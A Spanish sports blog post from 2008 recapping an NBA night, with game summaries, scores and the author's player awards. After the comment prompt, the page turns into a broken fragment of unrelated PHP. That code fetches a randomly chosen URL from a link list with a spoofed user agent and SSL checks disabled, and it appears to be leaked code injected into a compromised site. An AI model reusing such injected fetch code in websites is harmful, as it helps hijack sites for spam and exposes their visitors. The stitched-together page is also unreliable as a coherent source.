La crónica (02/02/08)

03 de February de 2008 por Jabho

Pasado el ecuador de la liga los equipos afinan la maquinaria para, una vez pase el All Star dentro de dos semanas, encarar la recta decisiva de la liga regular. Eso los afortunados o los que han hecho bien los deberes, porque los hay que en esta época ya están pensando en la loteria del draft… mala señal.

Veamos el resumen en imágenes de la jornada de ayer:

Anoche los Hawks vencieron a los Nets con buen partido de los Josh´s y de Marvin Williams más la siempre sobria actuación de Horford. Los Nets siguen encontrar una buena linea de juego y cada vez son mas insistentes los rumores de la marcha de Kidd. Magic y Pacers disputaron el partido con mas puntos de la jornada y se lo llevaron los de Orlando con 6 jugadores por encima de 15 puntos liderados, una vez más, por Turkoglu. Si en España nos preguntamos porqué Calderon no va al All Star en Turquia deben pensar algo parecido con Turkoglu. Volvió Lebron al quinteto de Cleveland y volvieron a ganar esta vez a los Clippers. Ningún equipo de la liga presenta una dependencia tan grande de su jugador franquicia como los Cavaliers. Por parte angelina destacar el papel importante que está asumiendo el rookie Thorton por las lesiones de Brand, Kaman y Magette. Derrota de los Grizzlies en su feudo ante los enrachados Jazz. Mucho van a sufrir en Memphis mientras esperan que la reconstrucción iniciada de sus frutos. Por parte de los Jazz hasta 6 jugadores sumaron más de 10 puntos con los habituales dobles dobles de Williams y Boozer. Kirilenko irregular en la linea de sus últimas tempradas. Comoda victoria de los Rockets ante unos Bucks que suenan a una de las decepciones de la temporada. McGrady tiró del carro, Scola ya es titular y Villanueva hizo mucho mas que Jianlian en menos tiempo. Los Nuggets rompieron el partido en el último cuarto y vencieron a unos Bobcats que habían estado muy bien hasta ese momento. El buen partido de Richardson y Okafor no bastó para frenar a Iverson&Anthony a los que se ha unido últimamente Kleiza. Cuarta victoria consecutiva de los Kings esta vez ante los Bulls que no levantan cabeza. Los Kings tienen lejos las plazas de Play Off pero aun así bonita temporada la suya. En Seattle los Knicks tuvieron la oportunidad de llevarse el partido pero no la aprovecharon. Ambos equipos están por debajo del 30% de victorias pero mientras los Sonics contaban con ello y con ir creciendo, en New York no se podran creer que cada año superen el ridículo echo el año anterior.

Resultados:

Nets 92 – 104 Hawks

Magic 121 – 115 Pacers

Clippers 84 – 98 Cavaliers

Jazz 110 – 91 Grizzlies

Rockets 91 – 83 Bucks

Bobcats 101 – 117 Nuggets

Bulls 101 – 105 Kings

Knicks 85 – 86 Supersonics

Veamos nuestros premios de la jornada:

MVP: La buena racha de los Kings coincide con el buen momento de juego de Brad Miller. Anoche 22 puntos, 20 rebotes, 4 asistencias, 4 balones robados, 2 tapones y tan sólo 2 pérdidas.

Rookie: Thorton y Durant sumaron mas de 20 puntos con 7 rebotes, pero ambos estuvieron en un bajo 30% de tiro. Navarro y Scola estuvieron correctos y Horford cumplió como de costumbre. De anoche nos quedamos con Dudley que fue titular con los Bobcats y aunque perdieron dejó una buena actuación con 11 puntos (50% en tiro) y 8 rebotes en 30 minutos.

Sopresa: Sorpresa pero menos el nivel que está mostrando Kleiza. En un equipo con Iverson y Anthony se está ganado a pulso sus minutos y sus tiros. Anoche 23 puntos, 8 rebotes y 2 tapones con 8 de 11 en tiro.

Decepción: Nos lo ponen fácil cada noche los jugadores de los Bulls y de los Knicks para que personalizemos la decepoción en uno de ellos. Anoche fue Nate Robinson, que está haciendo una campaña correcta, el que firmó un 0 de 9 en tiro y añadió 3 perdidas.

Nos depedimos con las mejores jugadas de anoche:

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>